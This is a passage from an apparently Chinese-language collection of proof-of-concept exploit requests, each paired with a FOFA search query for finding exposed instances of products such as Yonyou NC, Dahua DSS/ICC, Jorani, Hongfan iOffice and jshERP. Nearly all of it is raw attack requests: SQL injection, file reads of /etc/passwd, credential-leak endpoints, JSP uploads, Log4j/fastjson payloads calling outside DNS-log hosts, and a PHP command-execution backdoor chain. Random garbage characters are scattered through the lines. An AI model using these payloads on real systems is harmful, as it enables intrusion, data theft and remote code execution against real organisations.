' R/ X1 |) o* }$ `9 F) oFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"& l& X- M$ \9 P" C% N/ O7 A) \
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1/ y. M, d) U2 a1 r L! Z7 a
Host: 127.0.0.1$ X( y5 |% Q0 _; R0 n& Y
Pragma: no-cache1 G; ~6 _2 Q$ x2 }: H; e! E7 ]
Cache-Control: no-cache
( B, Q1 r, ?$ n* j" r3 Q% r$ OUpgrade-Insecure-Requests: 14 _; C, O7 I, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
& s$ d$ u# F0 O2 D5 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 ^: l4 E! _( T CAccept-Encoding: gzip, deflate
6 M& O* u! m: eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8$ t* [: ]. d8 a
Connection: close
7 n/ K( l3 I# }8 Q
& v' w, l% x4 N! [3 W1 z. L$ _ g h) d6 l `
12. Jorani < 1.0.2 远程命令执行5 Q( ?9 w9 K2 I2 w
FOFA:title="Jorani"
$ H2 w' ]5 i ]* j9 f第一步先拿到cookie
! t; L4 k7 G4 OGET /session/login HTTP/1.1
5 ?/ x/ Z6 p' [6 W$ B% Q7 a0 ^Host: 192.168.190.30
, N }3 B7 l `3 VUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
7 ]8 `& [1 n) h7 IConnection: close
" g/ Z" I: n! @( g! n: ]Accept-Encoding: gzip% h4 Y, {5 v' A4 H" s9 A7 R4 ]
# _9 j9 ^0 u' U* ?
- l* W8 ~9 X j
响应中csrf_cookie_jorani用于后续请求% m& }& b: z. s; R6 i* \5 u
HTTP/1.1 200 OK {' A# I& }# ?3 d
Connection: close
# U9 T- H- k* D" @8 ZCache-Control: no-store, no-cache, must-revalidate
7 B n+ J9 x6 k1 ], O9 X" `, z+ zContent-Type: text/html; charset=UTF-8, N1 I4 I# z1 ^$ z: I: f2 A5 E
Date: Tue, 24 Oct 2023 09:34:28 GMT# G; Y& H# D% t2 o7 `0 C6 U
Expires: Thu, 19 Nov 1981 08:52:00 GMT
$ @$ T+ c7 P/ B+ ^Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT' e* e3 u- F9 a) }5 Z7 {
Pragma: no-cache8 \6 X6 w# ?" U0 J9 p, v
Server: Apache/2.4.54 (Debian)
2 f7 @# F, z& K! \ B( M; T k7 Q9 _Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
% x8 Z; Q: ]( o; X$ xSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly! p3 N1 a, ]5 X$ W
Vary: Accept-Encoding
, v/ Q* w/ F- p) g+ w! J7 S& Z, E6 {$ N, b
9 Q1 y. p8 [' h+ j2 V6 d: C- m" Y' @POST请求,执行函数并进行base64编码
0 U7 V5 C. O% F8 NPOST /session/login HTTP/1.1
3 J6 {" F0 t# x- }: ^5 }$ n* THost: 192.168.190.30
" ~1 u) P3 w& Q7 \0 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.360 `* Z F, P4 q" a1 j" D" U7 g
Connection: close
! U9 b: I" |/ q9 wContent-Length: 252
8 b7 z! Q; k3 P5 d F" GContent-Type: application/x-www-form-urlencoded
+ ^/ G J! @/ q2 tCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r9 L8 Q/ `# F/ M% t
Accept-Encoding: gzip! ]. p, @% C \
* H7 V& V: l2 C/ F# j$ \ O6 \; L
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
4 {6 E9 K1 M/ T% @8 g# A& q1 [: c" t
8 ?0 R- o8 |& k; T/ q9 p& B! |1 m' U0 Z( x. d" |$ r
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串3 ~ N; d. M$ f3 d7 @) n
GET /pages/view/log-2023-10-24 HTTP/1.1
9 V; l7 Y! S# O, IHost: 192.168.190.30
: c4 ^! o* v8 N4 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
0 d/ ~4 F1 C$ Y: KConnection: close; L( o9 c9 @0 ^1 ?
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r8 N N3 _( y' b% F0 z+ T6 S3 u
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=: C7 Y' R7 R% i, i5 d
X-REQUESTED-WITH: XMLHttpRequest
0 {) X; [: G6 W4 E/ V! t oAccept-Encoding: gzip3 W P: I8 u; y2 s9 Y
1 r/ {- |/ I' W+ J Z1 R1 N: }
0 z- o x2 v9 x0 z# h' j' i13. 红帆iOffice ioFileDown任意文件读取; l; B9 g( ~0 k: C5 M1 O- j
FOFA:app="红帆-ioffice"
/ q: j1 m4 o' d% f8 vGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1" `5 t6 {4 g( |9 W: Y5 r8 {. j
Host: x.x.x.x8 t' R1 e& @3 R( `3 T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36# L6 V/ Z: h3 S! ^" B. D0 \
Connection: close
6 j# C8 t/ g9 n8 V+ M5 P1 |/ N& {Accept: */*7 ~* W! ~' t7 ?/ Y" T
Accept-Encoding: gzip
9 g0 F, i. e$ ?
' F( V; B6 b! d# n% ~: J" r8 o# i. F [! F0 `
14. 华夏ERP(jshERP)敏感信息泄露
# X. B% ^- k% m/ P# w6 rFOFA:body="jshERP-boot"
0 \9 o: O8 |7 o7 a泄露内容包括用户名密码9 B( A$ V% A* r4 R; V% n
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
% H" x" n2 l; [& tHost: x.x.x.x& Q- k) {7 [$ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36" u9 j/ k+ s+ Q4 d( W9 ~6 N
Connection: close
& k$ @8 M: V$ _ T2 XAccept: */** y) s; L0 W) K5 b/ V- K; t. y/ e
Accept-Language: en
( W! k+ ?' R# o- @) P( sAccept-Encoding: gzip
, M% a4 {2 X+ h1 m& G6 y! f4 J8 X. }: Y9 Q2 o
x5 C( d, ^( M+ F N2 @15. 华夏ERP getAllList信息泄露
% n6 X& L1 _, ]; RCVE-2024-0490
) P6 ~; o; a1 t5 R* {FOFA:body="jshERP-boot"
, P& P) M, t: ]# a5 }( c- R) ]泄露内容包括用户名密码
1 ]) i+ C' o7 m7 G0 N/ y! e2 C* s4 }6 mGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1; Q7 ]* y, [2 w% I
Host: 192.168.40.130:100
( G1 X) V0 I/ O) }8 ~% z$ lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36. R: f$ p% D/ { S5 k5 Y( N5 U5 ?
Connection: close+ `. ?) C v* G, W& |7 s6 R0 a
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
; f7 r) p: H7 WAccept-Language: en2 L. ~- n1 t. v# n7 \0 f
sec-ch-ua-platform: Windows
7 i* K* F- r0 o- _9 b7 [Accept-Encoding: gzip
% k& h) o* W! ~' ]# F1 g- l% `( T! @1 H
0 Y+ `4 r: `1 ]( s+ F. s/ q# P' G16. 红帆HFOffice医微云SQL注入" i8 z! A b$ Q
FOFA:title="HFOffice"" D$ I* P/ u3 K
poc中调用函数计算1234的md5值5 L8 `# u( z% \( x! ?4 ]
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1% D( V" e& p6 t
Host: x.x.x.x
" ?7 p7 \5 ^$ @/ b1 [1 dUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.361 }( n4 `7 u4 [
Connection: close! I3 n5 s1 C/ l& K4 l
Accept: */*. h" ~& d) k3 q- L
Accept-Language: en. z0 M4 B' a4 N+ H
Accept-Encoding: gzip
) G1 I3 [) C0 O' \4 Y: ~ L* F% |! c( h! a v1 j
4 ?0 J4 w9 T' {5 @
17. 大华 DSS itcBulletin SQL 注入
1 L8 i2 l0 ^# I5 @9 jFOFA:app="dahua-DSS"
0 c2 J) G7 b) n8 ^) c- ePOST /portal/services/itcBulletin?wsdl HTTP/1.1
% j/ K4 f7 H& n9 u; w2 J4 ?Host: x.x.x.x8 M: C: o4 y, ?2 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; `* h: L& r+ tConnection: close
2 p [' @: ]% w XContent-Length: 3455 d6 ^3 {% s4 q' x
Accept-Encoding: gzip
7 Q: g% Z7 `8 ?. _) v4 l# A( B2 k& Q( b
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
5 S- H/ z w# |! x5 j0 P3 ^" G<s11:Body>
( O3 D1 O1 C. s: a <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
( s& Z/ b( W+ f9 y8 S0 _% [ <netMarkings>6 b! G' o g1 |! B) t
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1- H$ f2 {6 |/ G& [1 |' K6 T" O
</netMarkings>! ]5 \# l+ y' A4 O( A" ]2 ^/ {
</ns1:deleteBulletin>( F; {" }* T/ @* x% B
</s11:Body>2 \+ R. E' M% ~: g3 a' v
</s11:Envelope>
( `# a2 F- H& E4 M- m* n7 h3 g- q2 ^8 _- Q! J
" n( q' g. ~+ Z9 N( s6 H' p18. 大华 DSS 数字监控系统 user_edit.action 信息泄露6 j! c3 q. S! t
FOFA:app="dahua-DSS"
3 P N7 @1 s0 Z/ c* D* ^* _GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
' S$ x7 B( T# K, T2 u5 ZHost: your-ip
5 O) {1 c! L* [; `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' U# J) i7 N4 o" W/ T1 @
Accept-Encoding: gzip, deflate4 c' c9 T4 y5 O. S8 a
Accept: */*
( H: V( t. N; {) q# X$ a; OConnection: keep-alive
3 {) l# b l1 Y1 O8 E+ i
. \+ y9 h% D" ?, T
% R1 W) _3 ?6 A+ |; y: m/ c2 f R8 P& ^! ?
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入7 Z4 b" i, h+ j' m/ [$ D5 ]; u* W
FOFA:app="dahua-DSS"
/ D) ~( J% D& J0 u. ZGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
" k/ _2 S1 \' P( f( \Host:3 S' W/ [) k/ Q# a5 L
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, z8 V1 M7 c: Q H
Accept-Encoding: gzip, deflate
' W g! V/ c9 e3 i% y/ S% G2 }1 s& XAccept: */*
+ R- i6 C g% p/ [3 }( OConnection: keep-alive, p3 D: Q6 j2 {$ n4 Z
% _9 n# z! ] y1 k) K" j
( [3 Y% g8 F ]% D
20. 大华ICC智能物联综合管理平台任意文件读取" g. c* T, N' D/ |
FOFA:body="*客户端会小于800*"
0 D+ s3 q0 l" u) O! S6 E4 MGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
% _, Y3 @4 b5 |$ g+ oHost: x.x.x.x
1 L8 ?$ Z; q J0 Y/ z) J) f3 RUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' O+ s6 c& X! x7 a* _- \
Connection: close
. {2 g1 \6 D* u) V* RAccept: */*2 j& v; V$ v8 N- G/ }. n
Accept-Language: en1 N% w* c! ?1 I: V# |, c: |( N" B1 y% t
Accept-Encoding: gzip
" ^# a' r# Q1 @( q6 _. x& q/ N6 T" ~
( g/ j+ b# |' {/ ]0 ]
21. 大华ICC智能物联综合管理平台random远程代码执行/ V/ I0 Y! [! h
FOFA:icon_hash="-1935899595"
3 w/ v+ \# W; p9 _ r" ?+ Y+ b" f9 fPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1% w( j5 V$ z) N6 N
Host: x.x.x.x! E/ e- G& V% t0 w# [# ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' l% H0 o' h( o' s2 V( R6 R3 L. ?
Content-Length: 161% f9 b/ e/ t# c/ [" k- w
Accept-Encoding: gzip$ W2 T9 j- G( c4 ]
Connection: close3 f1 r0 I3 ~$ H1 c
Content-Type: application/json;charset=utf-8( r' S F6 ^/ T5 B4 G
- Y: h3 o; J$ U# H
{
; d1 s, C# G1 K ?8 b o"a":{
% |- N. c' \# @" v4 b3 g* M7 \, T "@type":"com.alibaba.fastjson.JSONObject",
9 T1 O; Y1 T; U* @3 Q* Q$ J' ~ {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}" m: J, N. F, X. @, P/ \& O- y
}""
7 k! {; ~* t7 M}' T0 g1 a0 W9 {8 ^/ e
2 w O' `- `) x& b7 `+ [+ S7 K8 y! }) C R' `& ~! x8 T
22. 大华ICC智能物联综合管理平台 log4j远程代码执行" d% f1 b6 w0 U j7 D0 u6 g7 F ^
FOFA:icon_hash="-1935899595"- n3 S0 }: U5 a" d, s6 l
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1. J6 L, K5 N4 C+ A; [$ B. j
Host: your-ip
2 N- z' ?" u {4 `( z/ jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ g3 I6 A) X6 ~1 D
Content-Type: application/json;charset=utf-82 g" Q! M3 Q4 }! F. F8 a
; l2 G. T: T7 k# e; [
{
- F2 i/ y# V7 J"loginName":"${jndi:ldap://dnslog}"
/ z$ L3 l, h/ I2 m}. w" C# n: _4 l
7 s6 X; x' n/ ~+ U# }* Y
* T1 u4 G/ z9 v9 g
1 a9 W3 X4 Y& [, B23. 大华ICC智能物联综合管理平台 fastjson远程代码执行4 p/ R; q7 w# w# V5 p5 r. H
FOFA:icon_hash="-1935899595"9 j8 }) C( C H! B8 H& j4 z
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( i2 |9 H2 H( Z# Y7 GHost: your-ip7 x' O, X! U6 ]1 e" l' j/ c2 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' J7 H9 G7 Z$ S3 T" e' y5 z
Content-Type: application/json;charset=utf-8, t \4 r9 B$ p+ I& O8 s+ V% A
Accept-Encoding: gzip+ b# h* Y! x% e! K u
Connection: close8 O/ A! M$ m+ ]. G$ H. B* D" Z
+ t. X: _% ~4 N% |6 d{
" Q8 j0 y) h4 t$ M "a":{) l& b1 b/ f: g9 t! [
"@type":"com.alibaba.fastjson.JSONObject",8 c" g) l0 I/ L" q; ?2 |
{"@type":"java.net.URL","val":"http://DNSLOG"}8 x4 v7 d0 I) l: o9 F
}"": V0 c* E: n- u8 g! @
}) {* `6 _7 U$ L0 e% l; ^6 d
$ e" K7 E0 i' g( o$ Z
1 v1 I. u# Y6 Y8 W6 m. J- `3 P24. 用友NC 6.5 accept.jsp任意文件上传' k; ?8 G. P, X# a5 x2 s/ O( R' ^
FOFA:icon_hash="1085941792"" O, V- D- A9 J: p4 x/ T7 S7 ~# B5 g9 j
POST /aim/equipmap/accept.jsp HTTP/1.1
m- P0 g6 d- ?% A1 ZHost: x.x.x.x
% [. X9 U! N( h5 i9 Q+ p9 r9 T' w# _0 vUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.363 E: k2 d7 A: J, e
Connection: close
% w s( ]4 ~/ x' z& g2 ~1 P/ fContent-Length: 449% H% {: X5 [5 u& B
Accept: */*
, g; f9 y4 x6 t0 S( ZAccept-Encoding: gzip
8 X( P D5 }# b4 {* ]: \Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. M5 B% Y, J6 m. Q/ e. f9 M" M
) c# E: y1 t) z! q, M- V
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc: B8 S9 m+ \. P1 B4 x
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
. @& Z% ~6 e+ ?2 P' _5 LContent-Type: text/plain Z$ e |0 w3 ~0 l$ R3 ?1 l
0 v. k% w* X3 ~; Z7 `: Y
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>9 ~1 k, V# t! U
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 X, b: g, F" k! g
Content-Disposition: form-data; name="fname"
0 @8 m1 u V' ~, A6 \) \9 ^8 l% P; b2 S& I6 a3 e+ U
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp H+ y2 k6 j( x M9 W. X
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
& o; u' Z: r1 J7 h5 p. J2 M A% H; z# b( y' p
- i. e8 _& r' B$ ?25. 用友NC registerServlet JNDI 远程代码执行% g: F0 g& L c5 F) d
FOFA:app="用友-UFIDA-NC"
- F5 Q! p% O: f/ G" N( h5 L6 MPOST /portal/registerServlet HTTP/1.1
1 Y3 X2 X! o: J$ gHost: your-ip' B7 u0 T% B; j6 N' u5 r: F; L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.08 Y! N. t" B& e4 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
3 O' j- f! n/ c% ?$ _& |0 EAccept-Encoding: gzip, deflate
- r# M$ h; f" h pAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6! j+ Z O8 m5 ~4 k' X" h6 }
Content-Type: application/x-www-form-urlencoded
; d7 @) |" i; u5 d, t8 n
% s2 s) t$ o( D) `' {- |type=1&dsname=ldap://dnslog
8 K% a) ]% m( w% g+ O3 U( p& Q1 h- p" G$ Z
8 v* p9 {1 b/ m) G
$ \) H$ v$ v+ x26. 用友NC linkVoucher SQL注入
, S* ?$ {3 x( w( w) @FOFA:app="用友-UFIDA-NC"& r; t7 c9 |! v7 k& y: a& U! P
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1, C. @5 U; J% F$ j
Host: your-ip5 N% f+ c# V" Y: ~+ t: i! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ \1 \# B2 z2 B, ~4 R9 o
Content-Type: application/x-www-form-urlencoded
0 k" G# C" K! X/ R3 p/ |' bAccept-Encoding: gzip, deflate
2 a& h8 `: l% m7 KAccept: */*- W& w8 I3 @2 H/ z' L* G( f$ D
Connection: keep-alive
0 R$ K5 f7 P$ s9 J- C( Z+ \% s5 U4 s8 g0 M5 s' Q1 _+ s( T
' v3 Z! {2 u4 m. [# D2 U
27. 用友 NC showcontent SQL注入# T4 v3 Q) J9 e
FOFA:icon_hash="1085941792", g( ~% W+ g h) \5 k4 b
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
8 q& v; q( `, A0 Z5 i yHost: your-ip
6 ]' k: N( w! X% X- b4 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( q2 Z2 B1 K5 I( ]: J) a
Accept-Encoding: identity
1 w% P- K% ?. {Connection: close7 H+ L0 o& {$ w, A
Content-Type: text/xml; charset=utf-8
9 Y: N7 r7 h) }" F, z2 x- W
2 m( G! s4 f0 h
, T) i2 _: ]4 Q% O9 _1 L: o* o28. 用友NC grouptemplet 任意文件上传
' X x/ v2 m$ J1 l. o# H7 aFOFA:icon_hash="1085941792"; W1 o/ g8 R8 c. y/ W9 _; R# z
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1% n# U3 g- V& l n, H( ^' e) d b g. {
Host: x.x.x.x( Y: n0 e/ _& U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 b4 M9 M+ R+ Y7 bConnection: close
5 C. r: x$ y3 o6 Q: DContent-Length: 268
% Q) e' N7 M. Y% hContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk6 J d+ U% K$ Z0 L0 G4 w" t# Q- L
Accept-Encoding: gzip
- u* e) p. [# { W2 ^5 C7 O% e* ^' ?3 Y! c/ d
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
: d" P. A6 Y3 k# |Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"8 t6 x( E5 J- J; _
Content-Type: application/octet-stream
5 V2 |& m" \! r7 O- ?# h5 _( t7 L% D. l
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>& x- g: p! a+ P/ \$ O& l( F8 J/ D
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
' p- K( {" h ^" q+ m, C& J# }$ Q# E
( u4 D% ^, S0 Y* S
/uapim/static/pages/nc/head.jsp
) ^4 R7 U# H) [: Y; R2 t
, S) z6 w p3 ~; K9 U# A29. 用友NC down/bill SQL注入
2 m0 ]# e6 j! z# T6 KFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 }( k$ X' a h6 Z' RGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
! z1 O3 t7 q: p4 u9 dHost: your-ip; V3 K1 J) l7 M4 N5 s! l* y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 F- E1 t) e' n4 L( [; g9 j8 v
Content-Type: application/x-www-form-urlencoded
. F! C* m$ h/ S7 m* M3 O' t: NAccept-Encoding: gzip, deflate2 m+ C& Z v$ f# _0 c
Accept: */* O1 V% d( S3 p: O) E' q5 `/ o
Connection: keep-alive' Z9 V* F w, p3 G* b7 I
- F% E' f7 A. C ~- |- q* N
! U+ d/ L% k z# g- o2 H
30. 用友NC importPml SQL注入% r: M8 \ ?" n0 S- u% n7 V
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
$ q' `, B( \9 N$ c, PPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1( f) {: ?9 i9 |" E
Host: your-ip
4 W7 i* W* c& A) f7 L0 P; O9 i v, BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
5 b _ z) C2 S- N/ xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
$ X8 J9 G$ G/ s8 H/ e9 pConnection: close8 x& p1 x6 a3 P9 s1 D
9 c% I5 y( a* g8 Z% a; Z9 u# {3 K' E------WebKitFormBoundaryH970hbttBhoCyj9V
! O3 }/ W3 f/ o9 V& Q0 X1 c, _2 lContent-Disposition: form-data; name="Filedata"; filename="1.jpg"' f m% `( N3 _- u. E. d
Content-Type: image/jpeg* ^8 T; w2 f( I$ X3 n
------WebKitFormBoundaryH970hbttBhoCyj9V--
. L1 ^( A# D+ ]- t3 s- f6 k4 u
E* i% J- |3 x( `2 ^
31. 用友NC runStateServlet SQL注入/ R: x; @# A# ~8 ^) N/ j
version<=6.53 |/ @- Q" d! F- S- ~: I
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
0 `5 ~$ F% v9 ]" N: o2 NGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.13 B+ c- Q; L2 g# P# P2 [
Host: host& e+ d% C0 W$ G: ~" H4 p: L" r% O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 z# w- ~: p5 a8 `4 n: B; W9 x6 P
Content-Type: application/x-www-form-urlencoded
/ l7 h' ]1 V5 X7 l+ F/ v4 x% n( C
) ^6 w+ e `+ n! k2 X, h. B/ V* ], [9 S3 l3 a# w
32. 用友NC complainbilldetail SQL注入
4 ?. g) c5 [5 ?( l1 Nversion= NC633、NC65
6 G+ f M. A" v1 N" |FOFA:app="用友-UFIDA-NC". y2 l+ j' F$ ?3 m3 S8 Z. }1 T
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 b$ U+ x% B1 J9 E. C* @- e8 OHost: your-ip; W& \5 P9 ^! |1 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 \/ R! m: U6 f3 Q5 I+ J) L4 q( y
Content-Type: application/x-www-form-urlencoded
1 |- _7 o! O$ \8 h8 U* j$ aAccept-Encoding: gzip, deflate
9 I1 ~0 p( b: S; Q' |Accept: */*
6 Y y$ u/ m. z6 JConnection: keep-alive4 D- O0 c5 U2 ?0 _0 q8 N2 F
) E+ J9 }. L$ K# y; t# E
: C* Q. d0 \# j, V. k6 v
33. 用友NC downTax/download SQL注入( [' u7 ?. Y* k* ?: e" @9 [7 @0 q) _
version:NC6.5FOFA:app="用友-UFIDA-NC"
% j* E7 v+ F8 X) yGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.11 }3 E( E7 U4 X' m! ~
Host: your-ip
. ~/ n( p# z7 A2 _6 E6 }) Y6 g+ G- ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 B8 \) @ p, @% U3 dContent-Type: application/x-www-form-urlencoded! B: I8 t2 z) Z; ~" Q1 V1 s
Accept-Encoding: gzip, deflate
0 y( C! v# ], m7 H: U) JAccept: */*, a" C- z6 S$ ~5 ~* I& z
Connection: keep-alive
' k" P( d9 I b/ D1 k
1 M% H9 M& W/ H' q* Z. E9 K
( p9 f n. M, C; E34. 用友NC warningDetailInfo接口SQL注入
+ C: N2 V/ |. p6 {FOFA:app="用友-UFIDA-NC"
$ I, ~- H6 R4 s' IGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.12 ] `* z& ^: V5 _; ]
Host: your-ip
7 H+ q& {0 Z! KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 [! ?5 u- Q2 a0 X4 fContent-Type: application/x-www-form-urlencoded1 o( _( A" [- U, F# H. H! m+ M
Accept-Encoding: gzip, deflate
6 T2 L3 ]* j( d! e3 l' ?. fAccept: */*
- S3 y5 J# T# o# ^0 ^Connection: keep-alive
5 L' C8 u& v2 c% S, l$ ?4 f. z5 ]4 z& f; w3 f
